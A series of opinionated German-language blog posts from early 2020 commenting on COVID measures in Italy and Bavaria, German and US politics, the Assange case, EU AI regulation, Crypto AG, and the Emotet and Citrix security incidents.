Ja geil, ey!
Das Eigentor kriegen wir aber mit Sicherheit als Retoure zurück, sobald wir das nächste Mal Hilfe von der Schweiz brauchen.
Ich möchte hiermit allen Lesern aus der Schweiz mein Mitgefühl ausdrücken und für das Verhalten meiner Regierung um Entschuldigung bitten. What the FUCK! (Danke, Orlando)
[l] Man liest ja gerade überall, dass Italien drakonische Maßnahmen eingeführt hat, aber wenig Details. Hier ist ein Leserbrief von jemandem, der gerade aus Rom zurückkommt:
meine Frau und ich sind gerade zurück von einem Kurzurlaub in Rom. Wir haben miterlebt, wie die Stadt Stück für Stück dicht gemacht wurde. Am Freitag/Samstag war noch alles scheinbar in bester Ordnung. Der Trevi-Brunnen war voller Touristen (pun intended). Im Vatikanmuseum und in der Metro hat man ein paar Leute mit Schals und Atemmasken gesehen, allerdings auch nur unter den Besuchern. Sonntags waren dann ohne große Ankündigung auf einmal alle Museen geschlossen. Die Parks waren nach wie vor gut besucht, die Leute haben Picknicks veranstaltet und mit ihren Kindern Rad fahren geübt. Montags durften meine Frau und ich dann auf einmal im Restaurant nicht mehr nebeneinander sitzen, wir mussten aus Gründen der Ansteckungsgefahr einen Meter Abstand halten (!). Tun wir das nicht, dann macht die Polizei den Laden dicht. Die Bedienungen haben ab dem Zeitpunkt dann auch durchweg Handschuhe getragen. Allerdings keine Atemmasken.
Heute, also am Dienstag, gab es auch kein Frühstücksbuffet mehr, alles wurde an den Platz geliefert. Dazu noch ein Reisebann innerhalb Italiens. Das Taxi zum Flughafen hatte den Fahrgastraum mit Folie abgeklebt. Am Flughafen selbst haben sich interessante Szenen abgespielt. Das Security-Personal hat Masken getragen, das direkt daneben stehende Reinigungspersonal nicht. Ich habe Dutzende von Leuten gesehen, die sich mit (nutzlosen) chirurgische Atemmasken "geschützt" haben. Ein Mädchen hatte eine (sinnvolle) FFP3-Maske auf, aber mit einem breiten Spalt zwischen Kinn und Maske (epic fail). Dann gab's da noch die Tante mit panischem Blick, die eine Familienpackung Desinfektionsmittel mit sich herumgeschleppt hat...
Ich für meinen Teil bin ziemlich verblüfft, wie sich die gefühlte Stimmung in Italien innerhalb von wenigen Tagen gekippt ist. Mag sein, dass ich einen Bias habe und die Familien immer noch in den Parks picknicken. Ich hoffe, dass es so ist. Bei mir verbleibt allerdings der Eindruck, dass viele momentan nicht nur keine Ahnung haben, was sie tun (z.B. falscher Umgang mit Schutzmasken), sondern auch, dass eine große Unsicherheit über das aktuell angebrachte Verhalten vorherrscht. Gerade in Hinblick auf Letzteres bin ich von der Regierung Italiens, aber auch von unserer Bundesregierung ziemlich enttäuscht. Bin ich jetzt moralisch dazu verpflichtet, einen Maskenträger der Überreaktion anklagen? Was ist allerdings, wenn er/sie zu den älteren und vorerkrankten Personen gehört? Oder wenn es in seiner/ihrer Ortschaft Verdachtsfälle auf den C-Virus gibt? Dafür, dass das Thema so vielschichtig ist, sind mir die Antworten gerade jetzt nach meiner Erfahrung in Rom viel zu einfach. Da bleibt einem eigentlich nur eines, nämlich Ruhe zu bewahren und mitzudenken.
Man muss glaube ich schlicht konstatieren, dass die Welt nicht gut auf Pandemien vorbereitet ist. Auf Youtube wird einem gerade ein prophetischer Ted-Talk von Bill Gates empfohlen, der vor fünf Jahren im Wesentlichen genau das gesagt hat, und angemahnt hat, dass man da mal was tun müsste. Das war also mal wieder vorher klar und die Politik hat nichts getan.
Ich finde an dieser Stelle den Kontrast zu Polizei-Fragen auffallend. Bei Pandemien besteht eine klare, bekannte Gefahr, gegen die man offensichtliche Dinge tun könnte. Die werden nicht getan. Bei der "inneren Sicherheit" bestehen lauter unklare, unbekannte potentielle Gefahren, gegen die es keine erprobten Mittel gibt. Und da ist plötzlich keine Wirkung zu spekulativ, um erstmal überall Überwachung und Datenbanken und am besten gleich noch Gesichtserkennung auszurollen.
Was Italien gerade durchlebt, das steht auch uns bevor. Aus Bayern schreibt mir gerade ein Leser, dass der Semesterstart an ihrer Hochschule auf nach die Osterferien verschoben wurde.
Meine große Hoffnung ist ja, dass wir die Coronakrise nutzen, um breitflächig auf Telearbeit umzustellen. So viele Menschen fahren täglich völlig sinnlos ins Büro und tun da Dinge, die sie auch von zuhause aus hätten machen können.

Mon Mar 9 2020

[l] Bayern hat eine Allgemeinverfügung erlassen. Inhalt u.a.: 14 Tage Schulfrei für Kinder, die in Risikogebieten wie Südtirol waren. Gilt auch für Kindergärten und Kindertagesstätten.
Update: Ein Leser merkt an:
Weil Bayerische Ferien ja nicht so allgemein bekannt sind: ...die Allgemeinverfügung kam natürlich, nachdem alle Kinder nach den Winterferien (typisch: Skifahren in Südtirol) erst mal eine Woche in die Schule gegangen sind. Da kommt wohl auch ein guter Teil der x-hundert Infektionen her, jedenfalls gibt es allein um München herum (aktuell ca) zwei dutzend Schulen, die wegen Corona zugemacht sind.
(Danke, Michael)

Tue Mar 3 2020

[l] Da war wohl der Zensor pinkeln: "Löhne in Berufen mit "Fachkräftemangel" oft unterdurchschnittlich.
NA SOWAS! Das ist ja un-glaub-lich, Bob! Hat man sowas schon mal gehört?!
Äh, ja. In meinem Blog zum Beispiel. :-)
Update: Ich hoffe, ihr habt mal auf den Artikel geklickt. Der ist nämlich durchaus witzig. Money Quote:
So betrug das mittlere Einkommen für sozialversicherungspflichtig vollzeitbeschäftigte Fachkräfte 3.052 Euro brutto im Monat. Von den 52 Berufsgattungen, die laut einer BA-Analyse Engpässe bei Fachkräften haben, liegt das mittlere Entgelt bei 26 darunter.
Mit anderen Worten ist die inhaltliche Aussage hier: Die eine Hälfte liegt unter dem Durchschnitt, die andere Hälfte darüber. Das ist eher ein Zeichen für gleichmäßige als für ungerechte Verteilung, wenn Durchschnitt und Median gleich sind. Wir hoffen daher, dass unsere Leser die Grundlagen der Statistik nicht kennen.
Die Linken-Abgeordnete Sabine Zimmermann, die die Anfrage gestellt hatte, zog aus den Zahlen den Schluss, dass der Fachkräftemangel in vielen Berufen hausgemacht sei. "In Berufen mit niedrigen Löhnen möchten offensichtlich zunehmend mehr Menschen nicht arbeiten", sagte Zimmermann. "Bei den Arbeitgebern muss endlich ein Umdenken stattfinden."
Frau Zimmermann hofft auch, dass die Leser mit Statistik-Grundlagen überfordert sind. (Danke, Meno)

Mon Mar 2 2020

[l] Angeblich will Paul "The Vulture" Singer Twitter übernehmen und Jack Dorsey rausschmeißen. Paul Singer ist der Typ, der die Schulden Argentiniens nach der Staatsinsolvenz für einen Bruchteil ihres Nennwertes aufgekauft und dann einfach weltweit Eigentum des argentinischen Staates zum Papierwert beschlagnahmen lassen. Ähnlich hat er es auch mit der Republik Kongo gemacht. Wenn morgen fiese Aliens landen würden und ein Menschenopfer fordern würden, Singer wäre ganz vorne auf der Liste, wen man für das Gut des Planeten opfern könnte.
Jedenfalls hat dessen Hedge Funds jetzt angeblich substantielle Teile der Twitter-Aktien gekauft und will damit jetzt mal den "liberal bias" von Twitter bekämpfen, insbesondere in Form des CEO Jack Dorsey, der nichts gegen die ständigen Shitstorms gegen Trump und co tut.
Money Quote:
Nach Bekanntwerden der Beteiligung von Singers Hedgefonds stieg der Kurs der Twitter-Aktie.
LOOOL

Fri Feb 28 2020

[l] Ach nee! Die Berliner Polizei hat durch Miskommunikation versehentlich einen Fehler begangen und ihre fucking Arbeit gemacht. Ergebnis: Über 1000 Knöllchen. Staatskasse so gut wie saniert.
Hätte uns das doch gleich jemand gesagt, dass man mal dafür sorgen könnte, dass Autofahrer vor dem Abbiegen gucken, ob sie gerade einen Fahrradfahrer überfahren, und dass niemand Radwege und Busspuren vollparkt, dass die Leute vor roten Ampeln stehenbleiben und so weiter. Meine Güte, das konnte ja niemand ahnen, dass da so viel Geld zu holen ist!!1!
So und jetzt zurück zur Bekämpfung des Linksterrorismus in Form von böswilliger Manipulation von Werbeplakaten!

Wed Feb 26 2020

[l] Die Repressionsbehörden haben ja am Berliner Südkreuz mit Panoptikon-Technologie experimentiert und einen „Test“ zur maschinellen Gesichtserkennung gemacht. Dabei haben sie den besorgten Bürgern natürlich zugesagt, dass ihre Daten nicht gespeichert und schon gar nicht weitergegeben würden.
Dann passierte völlig überraschend das hier:
Martin Baer nahm 2017 an einem Test zur Gesichtserkennung teil. Drei Jahre später ist sein Foto im Fernsehen – und keiner will einen Fehler eingestehen.
Oh, das kann ich aufklären! Da war ja auch kein Fehler! Fehler impliziert Versehen. Das war kein Versehen. Das war alles von vorneherein so geplant. Sie haben uns genauso dreist ins Gesicht gelogen, wie sie uns auch sonst immer dreist ins Gesicht lügen.
Nur in schlimmsten Terrorfällen! Nur bei härtesten Verbrechen! Nur mit Richtervorbehalt!
Ja nee klar.
Es wird Zeit, das einmal in Gänze zurückzurollen. (Danke, Felix)
[l] Die CDU ist echt so eine Fremdschämnummer gerade. Wow. Dass ich das noch erleben darf!
Merz so:
"Es gibt niemanden in der CDU, der eine Rechtsverschiebung der Partei möchte"
Merz, du elender Anfänger! You went full Ulbricht, man! Never go full Ulbricht!
Und Röttgen so:
CDU soll Frauen und Klima können
Hey, WENN hier jemand Klimakompetenz hat, dann ja wohl die CDU! Röttgen als ehemaliger Umweltminister war genau der Zuständige, als die CDU uns in die Lage manövriert hat, in der wir jetzt sind. Die CDU gehört in eine warnende Akte ins Bundesarchiv, nicht ins Parlament.
Update: Übrigens, Lacher am Rande: Die Atlantikbrücke hat eine Rochade gemacht. Friedrich Merz war da jahrelang Vorsitzender. Jetzt ist es *trommelwirbel* Sigmar Gabriel. Stellvertretender Vorsitzender ist Norbert Röttgen und Merz taucht gar nicht mehr auf. Lasst euch davon mal nicht verarschen. Merz und Röttgen sind beides die Vertreter der USA. Wenn einer von denen Kanzler wird, kann die USA eigentlich auch direkt ihren Botschafter zurückholen. Den Job kann der Kanzler dann gleich miterledigen.

Tue Feb 25 2020

[l] VWs Elektroautoproduktion läuft wohl eher nicht so gut. Der Primärartikel ist hinter einer Paywall, daher der Link zu dieser Gruselsite. Money Quote:
Bei Probefahrten, die jede Nacht in Sachsen und Sachsen-Anhalt stattfinden, werden die Probleme zu Tage gefördert: Bis zu 300 neue Probleme kommen täglich dazu.
Sportlich! Immer ein gutes Zeichen für die Entwicklungsprozesse, wenn Probleme bei der Probefahrt auffallen. Da hat jemand wirklich seinen Job gemacht!1!! (Danke, Bernd)

Sun Feb 23 2020

[l] Kennt ihr den schon? Hey, Katar, könnt ihr bitte diskret Hamas weiterfinanzieren?
Ja gut, denkt ihr euch jetzt wahrscheinlich, Terroristen are gonna Terrorist. Das wird irgendein durchgeknallter Araber sein, der Katar um Geld für Hamas gebeten hat.
Nun, … es war der Chef des Mossad. Und geschickt hatte ihn Netanjahu persönlich.
Wir wissen das, weil ein Ex-Verteidigungsminister in einem Fernsehinterview seiner Unzufriedenheit Luft gemacht hat.

Wed Feb 19 2020

[l] Eigentlich waren sich doch damals alle Beobachter einig, dass Donald Trump als erste Amtshandlung Julian Assange befreien und notfalls begnadigen würde.
Wieso hat das nicht stattgefunden?
Das hat sich jetzt geklärt:
U.S. President Donald Trump offered to pardon WikiLeaks founder Julian Assange if he said that Russia had nothing to do with WikiLeaks’ publication of Democratic Party emails in 2016, a London court heard on Wednesday.
Ach naja, denkt ihr euch jetzt vielleicht, der Assange sagt doch bestimmt alles, um aus dem Folterknast rauszukommen. Nun, diese Information kommt nicht von Assange sondern von Dana Rohrabacher, einem republikanischen Kongressabgeordneten aus den USA. Der hat das 2017 bei einer Zeugenbefragung so ausgepackt.
Dieser Rohrabacher war hier schonmal im Blog, so tief hat der ins Klo gegriffen. Das muss man erst mal leisten, dass ich mich nach über 10 Jahren noch an den Namen erinnere. Wikipedia über den. Das ist so ein laufendes Klischee eines Republikaner-Abgeordneten. Der Anfang seiner Karriere war als Pressefuzzy für Ronald Reagan. Der findet Folter gerechtfertigt, ist ein Fan von Russland und Putin, war für den Irakkrieg, ist pro Taiwan und gegen China, war ein Fan der Mujaheddin, ist ein Antikommunist, glaubt nicht an den menschengemachten Klimawandel, will die fiesen Immigranten abwehren, und ließ sich von Alex Jones zitieren, die Democrats hätten ja die eine Alt-Right-Demo unter falscher Flagge organisiert, damit es dann zu gewalttätigen Auseinandersetzungen kommt. Ein Zerrbild. Seine Karriere endete mit einer Abwahl, nachdem er von Sacha Baron Cohen vor laufender Kamera dazu verleitet wurde, sich hinter ein fiktives Programm zum Bewaffnen von Kindergarten-Kids (ja, den Kids, nicht etwa den Erziehern) zu stellen.
[l] Gute Nachrichten!
Die EU hat verstanden, dass KI riskant sein kann!
Ihre Antwort:
EU-Digitalstrategie: Hochrisiko-KI muss zertifiziert werden
Ich möchte an der Stelle darauf hinweisen, dass die Brücke in Genua auch zertifiziert war. Genau wie die neuen Boeing-Maschinen.
Aber gut, was erwartet man von der EU. Die waren bei der amerikanischen Management-Schule. Wo ich ein Problem sehe, sehen die eine Gelegenheit. Machen wir ein Zertifizierungsprogramm, schaffen wir Arbeitsplätze! Klar löst das das Problem nicht. Aber darum ging es ja in der EU noch nie.
Generell in der Politik übrigens. Genau wie in der Medizin. Das Geld liegt in der Behandlung, nicht in der Heilung. In der Politik werden Probleme daher nicht gelöst sondern gemanaged. Und zwar möglichst unzureichend, damit wir auch morgen noch Politiker brauchen, die sich um unseren Turm aus ungelösten Problemen kümmern.
Und wir Nerds fragen uns derweil, ob die eigentlich nie Battlestar Galactica geguckt haben.
Vielleicht haben wir ja die Lektion von Terminator 2 völlig falsch verstanden. Die Lösung des Problems kommt ja vom Terminator selbst, von der KI. Und so langsam befürchte ich auch, dass ich eine höhere Erfolgswahrscheinlichkeit habe, wenn ich hoffe, dass eine KI uns retten wird, als wenn ich hoffe, dass die Politik uns retten wird.
Lest euch den Artikel mal ganz durch. Ich kann da gar keine einzelnen Zitate rausgreifen, so ein Gesamtkunstwerk an Totalschaden ist das.
Systeme für Künstliche Intelligenz (KI) sollen in Einsatzbereichen mit hohem Risiko wie Gesundheit, Polizei oder Verkehr transparent und nachvollziehbar sein
Na DA hätten wir Idioten ja auch selber drauf kommen können!!1!
Die Technik müsse stets von Menschen beaufsichtigt werden können.
Ja klar! Das ist ungefähr so realistisch wie dass das Parlament die Geheimdienste beaufsichtigt!
Behörden sollen die von Algorithmen genutzten Daten ebenso prüfen und zertifizieren können, wie sie es bei Kosmetika, Autos und Spielzeug bereits tun.
Ach nee, jetzt wollen sie die Daten zertifizieren, nicht nur die KI? Wie genau soll ich mir das vorstellen? Wie bei Facebook die menschlichen Contentfilterfarmen im Kambodscha?
"Hochrisiko-KI" müsse getestet und zertifiziert werden, "bevor sie auf den Binnenmarkt kommt". Einbezogene Datensets sollten "frei von Vorurteilen" sein.
Genau! So machen wir das einfach. Sagen Sie mal, Frau von der Leyen, wenn Sie sich da so gut auskennen: Woran erkennen wir das?
Die Technik sei zudem entscheidend, um das Ziel der Klimaneutralität etwa mit Precision Farming oder intelligentem Heizen zu erreichen.
Geil! KI für Klimaschutz! Pass auf, Fefe, für die Emissionen der KI-Computer kaufen wir dann einfach CO2-Zertifikate!!1! Dann sind wir klimaneutral!1!!
"Je mehr Daten wir haben, desto intelligenter sind unsere Algorithmen", sagte von der Leyen in Brüssel.
So ungefähr muss sich das im Ostblock bei einer Politbüro-Pressekonferenz angefühlt haben. Läuft alles super! Die Probleme lösen sich von selbst! Unsere motivierten patriotischen Genossen kümmern sich. Ist jetzt schon alles geil, morgen wird es noch geiler!
Betreiber müssten bei einer hohen Risikoklasse abschätzen, ob ein Einsatz der Technik "mit unseren Werten vereinbar ist".
Lass mich das kurz aufklären: NA KLAR ist meine Anwendung mit unseren Werten vereinbar! Sonst hätte ich sie ja gar nicht vorgeschlagen!1!! Welche Werte? Na Profitmaximierung und Shareholder Value, was denn sonst?
KI-Systeme müssten auch "technisch robust und präzise funktionieren".
Was wären wir ohne die Experten der EU? Wir müssen einfach ab jetzt technisch robuste Systeme bauen, die präzise funktionieren! *stirnklatsch* Also DA hätten wir auch ECHT selber drauf kommen können!!
Da weißt man echt gar nicht, in welche Richtung man seinen Magen zuerst entleeren soll.
[l] Kurze Durchsage von Griechenland: Hey UK, wenn ihr einen Trade Deal wollt, dann gebt erst mal unsere Kunstschätze zurück! Es geht um die Elgin Marbles, ursprünglich Teil des Parthenon-Tempels auf der Akropolis, von Lord Elgin geraubt und seit dem eine der Kern-Exponate im British Museum.
Wenn DAS Fass aufgemacht wird, dann wird das auch für Deutschland sehr unerfreulich.

Tue Feb 18 2020

[l] Wenn mich in 20 Jahren jemand fragt, wieso die Briten aus der EU raus sind, werde ich sagen: Weil sie ungestört foltern wollten.
Das ist übrigens ein echter Paukenschlag, dass das im Lancet erscheint. Das ist eines der berühmtesten, wichtigsten und prestigeträchtigsten medizinischen Journals überhaupt. Wikipedia schreibt:
the journal has a 2017 impact factor of 53.254, ranking it second after The New England Journal of Medicine in the category "Medicine, General".
Das ist bei denen in der Correspondence-Sektion erschienen, die vielleicht am ehesten mit einem Leserbriefbereich zu vergleichen ist. In dem Bereich haben sie auch 2014 einen "offenen Brief an die Menschen in Gaza" geschickt, der auch echt Wellen gemacht hat. Der Autor dieses Briefes kommt von Doctors For Assange.
[l] Ein paar Japaner haben mal ein Tesla Model 3 aufgemacht und sich die Teile angeguckt. Ergebnis:
The module — released last spring and found in all new Model 3, Model S and Model X vehicles — includes two custom, 260-sq.-millimeter AI chips. Tesla developed the chips on its own, along with special software designed to complement the hardware.
Das klingt jetzt vielleicht nicht sonderlich beeindruckend, aber es beunruhigt die Konkurrenz gewaltig. Die ist im Vergleich ca 6 Jahre im Rückstand, schätzt der Artikel. Warum ist das so bemerkenswert? Weil Tesla damit ohne die riesige Zuliefererkette auskommt, die die traditionelle Autoindustrie prägt.
Such systems will drastically cut the number of electronic control units, or ECUs, in cars. For suppliers that depend on these components, and their employees, this is a matter of life and death.
So big automakers apparently feel obliged to continue using complicated webs of dozens of ECUs, while we only found a few in the Model 3.
Mit anderen Worten: Teslas Modell ist eine Disruption des Supply-Chain-Modells, und die traditionellen Autobauer werden den Weg auch gehen müssen, um konkurrenzfähig zu bleiben.
Das sind schlechte Nachrichten für Deutschland, weil bei uns große Teile der Wirtschaft aus Zulieferern für Autobauer bestehen.

Fri Feb 14 2020

[l] Interessante Schilderung einer Trump-Rally von einer in ihrer Strickgruppe radikalisierten Democrat-Wählerin. Money Quote:
Democrats have an ass-kicking coming to them in November, and I think most of them will be utterly shocked when it happens.
Das glaube ich auch. Ich sage an dieser Stelle voraus: Trump wird wiedergewählt. Bernie Sanders hätte eine Chance, aber das würde mich wundern, wenn sie den aufstellen. Der wird gerade (passend zur aktuellen Hufeisen-Debatte hier) als Linksextremist abgekanzelt.
The more voices outside the left that I listened to, the more I realized that these were not bad people. They were not racists, nazis, or white supremacists. We had differences of opinions on social and economic issues, but a difference of opinion does not make your opponent inherently evil. And they could justify their opinions using arguments, rather than the shouting and ranting I saw coming from my side of the aisle.
Na? Kommt das jemandem bekannt vor?
Liebe Leser, denkt euch mal den absurdesten Spinner, den ihr euch vorstellen könnt. Und jetzt stellt euch sein Gehirn vor. Das ist eine Verdrahtung von Neuronen. Eine Maschine. Die Verdrahtung kommt von Erfahrungen. Wenn ihr seine Erfahrungen gemacht hättet und seine Faktenlage hättet, dann würdet ihr genau das entscheiden, was er jetzt auch entscheidet, und was ihr so furchtbar findet.
Die Leute, die zu anderen Ergebnissen kommen als ihr, die sind nicht alle kaputt. Beziehungsweise anders herum: Aus deren Sicht seid ihr die Kaputten. Deren Einschätzung von euch ist genauso rational und gültig oder ungültig wie eure Einschätzung von denen.
Wenn ihr denen jetzt sagt, ihre Erfahrungen stimmen nicht oder eure Schlussfolgerungen sind falsch, dann finden die das ungefähr genau so überzeugend wie ihr das finden würdet, wenn die zu euch kämen und euch das sagen würden. So ist noch nie irgendjemand von irgendwas überzeugt worden.
Update: Jetzt muss ich mich hier von meinem Kumpel Frank anpupen lassen, weil er findet, ich hätte hier die nurture-vs-nature zu beantworten versucht, und zwar falsch, weil der Nature-Anteil eben nicht 0 ist, und genetische Einflüsse auf die Persönlichkeit gut nachgewiesen seien. Ich notiere mir das mal für die nächste Alternativlos-Sendung.

Wed Feb 12 2020

[l] Ich hatte hier neulich die Gebührenordnung der Bundespolizei im Blog. Es blieb aber die Frage offen, an wen die Gebührenbescheide gehen: An den Bahnhof oder an das Opfer der staatlichen Repressionsmaßnahmen. Die Frage scheint jetzt geklärt:
In NRW werden aufgrund der neuen Verordnung nun erste Zahlungsaufforderungen verschickt. Eine Frau soll 550,- € zahlen, weil sie ihren Koffer auf dem Düsseldorfer Hauptbahnhof unbeaufsichtigt ließ. Sie wurde erst nach 30 Minuten ausfindig gemacht, als schon großräumig um das Gepäckstück abgesperrt war.
Ein spannendes Detail aus dem Artikel:
Denn es scheint weniger um die Aufbesserung der Staatskasse, als um Repressionen zu gehen. Schon jetzt zahlt der Staat sehr viel mehr Geld für Zwangsunterbringungen in Gefängnissen derjenigen, die nicht zahlen können, als von den Inhaftierten hätte gezahlt werden müssen.

Tue Feb 11 2020

[l] Die CIA hat 2018 ihren Anteil an der Crypto AG verkauft, die vorher mit dem BND zusammen Backdoor-Equipment an ausländische Botschaften verkauft hat. Der BND war in den 1990er Jahren ausgestiegen. Die CIA hat bis 2018 weitergemacht.
Jetzt sind die CIA-Anteile verkauft. Da kann dann auch das ZDF mal zaghaft zu berichten anfangen. Die Geschichte ist seit vielen Jahren bekannt. Ich hatte die auch schon im Blog. Neu ist bloß, dass die CIA einfach weitergemacht hat.
Ich freue mich einerseits, dass das thematisiert wird, aber auf der anderen Seite finde ich es ein bisschen peinlich, wie das ZDF jetzt einen auf dicke Hose macht mit ihrem super-investigativen Journalismus von Dingen, die schon seit Jahren in der Wikipedia stehen, und dann solange gewartet habend, bis die CIA ihre Assets migrieren konnte.
Immerhin entbehrt es nicht einer gewissen Komik, die offiziellen Stellungnahmen der Befragten zu lesen. CIA, BND und Siemens haben direkt jeden Kommentar verweigert, die Schweizer wollen von nichts gewusst haben, und dem Parlamentarischen Kontrollgremium sagte man unter der Hand, das sei ja alles kalter Kaffee.
Ich fände das ja prima, wenn wir jetzt ein bisschen mehr solche Stories kriegen würden. Am besten über zeitgenössische Vorfälle. Denn, nicht vergessen, diese Geheimdienste, das sind die, denen wir an anderer Stelle vertrauen sollen, wenn es um Krypto-Hintertüren und Trojaner auf unseren Telefonen geht, und um Hackback.

Sat Feb 8 2020

[l] Kurze Durchsage des Bundestags-Vizepräsidenten zur Lage in Thüringen:
Mensch @RolandTichy , was heißt hier „demokratische Wahl“. Sie können doch nicht einfach die Mehrheit entscheiden lassen, wenn eine moralisch höherwertige Minderheit anderer Meinung ist. Wir müssen Demokratie völlig neu denken.
Das war eine Reaktion auf diesen Tweet von Roland Tichy:
Nicht nur eine demokratische Wahl wird "rückgängig" gemacht - auch Gratulanten werden für ihre Höflichkeit bestraft. Das System Merkel dreht durch.
Der Friedrich war mal unser Innenminister, auch wenn die meisten von euch die Erinnerung an dieses Trauma wahrscheinlich unterdrückt haben werden.

Thu Feb 6 2020

[l] Oh wow. Kemmerich wirft hin, FDP Thüringen will Parlament auflösen und Neuwahlen erzwingen.
Vermutlich haben die kurz eine Telefon-Blitzumfrage gemacht und sich daran erinnert, dass politische Arbeit unter 5% nicht so viel Spaß macht, und erst Recht nicht bei 0,5%.

Wed Feb 5 2020

[l] Jonathan Pie hat eine tolle Dokumentation gemacht. Über sich selbst. Fängt langsam an, insofern: Andere Tabs zumachen. Die Viertelstunde ungeteilte Aufmerksamkeit solltet ihr euch nehmen.

Sat Feb 1 2020

[l] Der Uno-Sonderberichterstatter für Folter, Nils Melzer, in einem aktuellen Interview über Julian Assange. Mit so Money Quotes wie (zur Frage, ob Julian sich der schwedischen Justiz entzogen habe):
Das dachte ich auch immer, bis ich zu recherchieren begann. Das Gegenteil ist der Fall. Assange hat sich mehrfach bei den schwedischen Behörden gemeldet, weil er zu den Vorwürfen Stellung nehmen wollte. Die Behörden wiegelten ab. […]
Ich spreche fliessend Schwedisch und konnte deshalb alle Originaldokumente lesen. Ich traute meinen Augen nicht: Nach Aussagen der betroffenen Frau selber hat es nie eine Vergewaltigung gegeben. Und nicht nur das: Die Aussage dieser Frau wurde im Nachhinein ohne ihre Mitwirkung von der Stockholmer Polizei umgeschrieben, um irgendwie einen Vergewaltigungsverdacht herbeibiegen zu können. Mir liegen die Dokumente alle vor, die Mails, die SMS.
Und ab packt er dann die Details des Falles aus und es wird immer schlimmer und schlimmer.
Der gute Mann listet der Reihe nach die Fakten auf, und er ist offensichtlich kein bezahlter oder ideologischer Partisan oder Fanboy von Julian Assange, sondern er hat halt seine Arbeit gemacht. Nehmt euch dieses Wochenende eine halbe Stunde Zeit und lest das in Ruhe durch. Das ist die Realität, in der wir leben.

Mon Jan 27 2020

[l] Nach dem Emotet-Befall hat das Kammergericht Berlin einen forensischen Bericht anfertigen lassen. Der kommt völlig überraschend zum Ergebnis: Totalschaden.
Interne Daten wurden geklaut und "ein kompletter Neuaufbau der IT-Infrastruktur wird […] angeraten", heißt es im forensischen Bericht zum Emotet-Befall.
Ich möchte an dieser Stelle darauf hinweisen, dass das nicht an Emotet liegt. Wenn eine IT von Emotet befallen werden kann, dann war sie schon vorher ein Totalschaden.
Oh und noch ein Hinweis sei erlaubt: Die haben Schlangenöl von McAfee am Start gehabt. Warte mal, war die Existenzberechtigung von Schlangenöl nicht, dass es gegen Malwarebefall hilft? Hätte uns doch nur jemand gewarnt!!1!
Dazu zählt das Versagen der Endpoint Protection Lösung von McAfee, fehlende Filter und Netzwerksegmentierung, lokale Administratoren und mangelnde Log-Dateien.
Na? Erkennt sich jemand wieder?
Filter und Netzwerksegmentierung sind nett, aber verhindern natürlich einen Malwarebefall nicht. Das ist eine Nebelkerze. Und Logdateien hätten auch nicht geholfen, denn die Eindringlinge haben erstmal das Windows Event Log geputzt. Da waren also Logs. Sie waren nur leer.
Das eigentliche Problem ist ein anderes. Windows. Outlook. Active Directory. Das ist die tödliche Kombination. Das Kammergericht hat nochmal obendrauf auf voller Front versagt, indem sie lokale Admins zugelassen haben. Das würde ich unter Windows außerhalb von Development-VMs und anderen Testumgebungen als grobe Fahrlässigkeit einordnen, wenn mich jemand fragen würde.
Mich hätte noch deren Patchmanagement interessiert, auch wenn das für den Emotet-Befall vermutlich den Kohl nicht fett gemacht hätte.
Oh und ich hätte gerne gewusst, ob das für irgendeinen der IT-Zuständigen jetzt Konsequenzen hat. Wenn sie das nicht komplett outgesourced haben, und dann *schulterzuck* kann man ja eh nichts machen.

Sun Jan 26 2020

[l] Gute Nachrichten (nein, diesmal wirklich!):
In 2019, more Americans went to the library than to the movies. Yes, really.
Ich kann das aus eigener Beobachtung bestätigen. Die Bibliotheken sind in den USA der Stolz der jeweiligen Kommunen. Da wird nicht gespart, da wird geklotzt. Selbst in winzigen Bergdörfern gibt es noch eine Library in Form eines Bücherbusses, der Bestellungen annimmt, und einmal die Woche vorbeikommt.
Bei uns hingegen … *Tumbleweed* *Crickets*
Meine örtliche Bibliothek hat gefühlt in den 1970er Jahren zugemacht. Die blieb noch bis in die 90er auf dem Papier offen, aber ohne irgendwelche neuen Bücher oder Möbel oder sonstige Investitionen. Und es roch dort schon in den 70ern nach vermoderndem Altpaper.
Update: Zu meiner großen Freunde kriege ich gerade eine Menge Widerspruch rein. Offenbar ist meine Bezirksbibliothek da eine Ausnahme. Unter meinen Lesern gibt es jedenfalls einige, die mit ihren Bibliotheken voll zufrieden sind. Ich war auch nicht unzufrieden, versteht mich nicht falsch. Geschenkte alte Bücher sind immer noch geschenkte Bücher. Das änderte sich erst, als ich in den USA war und dort die Bibliothek von Bellevue besucht habe, ein Vorort von Seattle mit ~150k Einwohnern. Und in der von Seattle. Da sieht man schon den Gebäuden an, dass die das nicht als ein Angebot von vielen sehen sondern das leistet man sich als Stadt und ist stolz darauf.
In 1998, Seattle voters, with an unprecedented 69 percent approval rate, approved the largest library bond issue then ever submitted in the United States. The $196 million "Libraries for All" bond measure, along with private funds raised by The Seattle Public Library Foundation, nearly doubled the square footage in Seattle's libraries, including the building of new branches and a new Central Library.
Oh und die Libraries in den USA hatten auch DVDs. Wir reden hier von Mitte 2000er. Selbst da hatten die schon e-book Online-Ausleihe.
[l] Das Citrix-Massaker hat noch ein interessantes Detail:
Wie einem Mitglied der AG KRITIS vertraulich zugetragen wurde, hätte die Citrix-Sicherheitslücke bereits einige Tage oder Wochen vor der ersten Meldung von Citrix am 17.12.2019 an das BSI gemeldet werden können. Mitarbeiter eines DAX30-Konzerns hatten schon früher Kenntnis über die Sicherheitslücke erlangt – entschieden sich aber, diese nicht dem BSI zu melden. Mangels Vertrauen, dass diese Erkenntnisse nicht auch über das BMI an die Sicherheitsbehörden zur Ausnutzung gelangen würden!
ACH NEE. Na sowas. Tja. Hätte uns doch nur jemand vorher gewarnt.
Seit wieviel Jahren bläst der CCC jetzt in dieses Horn? 10? 20? 30?
Nun kann man ja verschieder Meinung sein, ob der Staat bei kritischen Infrastrukturen seine Finger im Spiele haben sollte oder nicht. Man könnte aus zwei Gründen dagegen sein. Entweder man ist Marktfundamentalist und findet, der Markt solle das selber regeln. Oder man hat bei Snowden zugehört und will den Staat grundsätzlich raus haben aus allen Sicherheitsfragen in der Wirtschaft. Es ist schließlich bekannt, dass die Bundesregierung es sich im Rektum der USA bequem gemacht hat und denen wie ein Schoßhündchen alle Informationen gibt, die sie haben wollen, in der Hoffnung, dann von CIA und NSA über Terroranschläge informiert zu werden, die wir nicht hätten, wenn wir nicht den USA in ihre Kriege hinterherziehen und helfen würden.
